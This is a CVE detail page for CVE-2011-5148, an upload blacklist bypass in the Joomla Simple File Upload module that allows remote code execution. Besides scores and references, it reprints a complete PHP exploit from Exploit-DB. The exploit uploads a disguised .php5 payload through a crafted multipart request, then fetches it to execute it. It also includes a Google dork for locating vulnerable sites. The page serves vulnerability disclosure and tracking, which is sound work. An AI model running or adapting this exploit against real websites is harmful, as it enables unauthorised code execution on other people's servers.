CVE-2011-5148 : Detail

CVE-2011-5148

24.84%V3
Network
2012-08-31
19h00 +00:00
2017-08-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple incomplete blacklist vulnerabilities in the Simple File Upload (mod_simplefileuploadv1.3) module before 1.3.5 for Joomla! allow remote attackers to execute arbitrary code by uploading a file with a (1) php5, (2) php6, or (3) double (e.g. .php.jpg) extension, then accessing it via a direct request to the file in images/, as exploited in the wild in January 2012.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 18287

Publication date : 2011-12-27 23h00 +00:00
Author : gmda
EDB Verified : No

<?PHP /* -------------------------------------------------------------------------------- Title: Simple File Upload v1.3 (module for joomla) Remote Code Execution Exploit -------------------------------------------------------------------------------- Author...............: gmda Google Dork..........:"Simple File Upload v1.3" "Powered by Joomla" Mail.................: gmda[at]email[dot]it Site.................: http://www.gmda.altervista.org/ Date.................: 26/12/2011 Software Link: http://wasen.net/downloads/mod_simpleFileUpload.1.3.zip Version: 1.3 Tested on: winxp php version 5.3.2 Apache 2.0 *the setup of the module is no captcha other setups are the default* +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ The vulnerability is closed to transmit malformed packets to the server that he still plays and saves in his belly. This thing can be a bad intent to send commands to the server running clearly causing safety problems ........ The script has peroblemi upload quality control ..... */ $host="127.0.0.1"; $port=80; $shell="R0lGOC8qLyo8P3BocCBwYXNzdGhydSgnY2FsYycpPz4vKg=="; $ContentType="image/gif"; $post="POST http://$host/Joomla_1.5.23_ita-Stable_test_expl/index.php"; $fp = fsockopen($host, $port, $errno, $errstr, 30); $filename="file.php5"; if(!$fp) die($errstr.$errno); else { $data="-----------------------------41184676334\r\n"; $data.="Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n"; $data.="\r\n"; $data.="100000\r\n-----------------------------41184676334\r\n"; $data.="Content-Disposition: form-data;name=\"sfuFormFields44\"\r\n"; $data.="\r\n\r\n"; $data.="-----------------------------41184676334\r\n"; $data.="Content-Disposition:form-data; name=\"uploadedfile44[]\"; filename=\"file.php5\"\r\nContent-Type: image/gif\r\n\r\n"; $data.=base64_decode($shell)."\r\n"; $data.="-----------------------------41184676334--\r\n"; $packet="$post HTTP/1.1\r\n"; $packet.="Host: ".$host.":".$port."\r\n"; $packet.="Content-Type: multipart/form-data; boundary=---------------------------41184676334\r\n"; $packet.="Content-Length: ".strlen($data)."\r\n"; $packet.="Connection: Close\r\n\r\n"; $packet.=$data; fwrite($fp, $packet); fclose($fp); } $h = @fopen("http://".$host."/Joomla_1.5.23_ita-Stable_test_expl/images/file.php5", "r"); if ($h) { while (($buf = fgets($h, 4096)) !== false) { echo $buf; echo("exploit was successful"); } fclose($h); }else{ echo("Error: exploit fail"); } ?>

Products Mentioned

Configuraton 0

Wasen>>Mod_simplefileupload >> Version To (including) 1.3

Wasen>>Mod_simplefileupload >> Version 1.0

Wasen>>Mod_simplefileupload >> Version 1.1

Joomla>>Joomla\! >> Version *

References

http://www.exploit-db.com/exploits/18287
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/51214
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/bid/51234
Tags : vdb-entry, x_refsource_BID
http://www.osvdb.org/78122
Tags : vdb-entry, x_refsource_OSVDB
http://secunia.com/advisories/47370
Tags : third-party-advisory, x_refsource_SECUNIA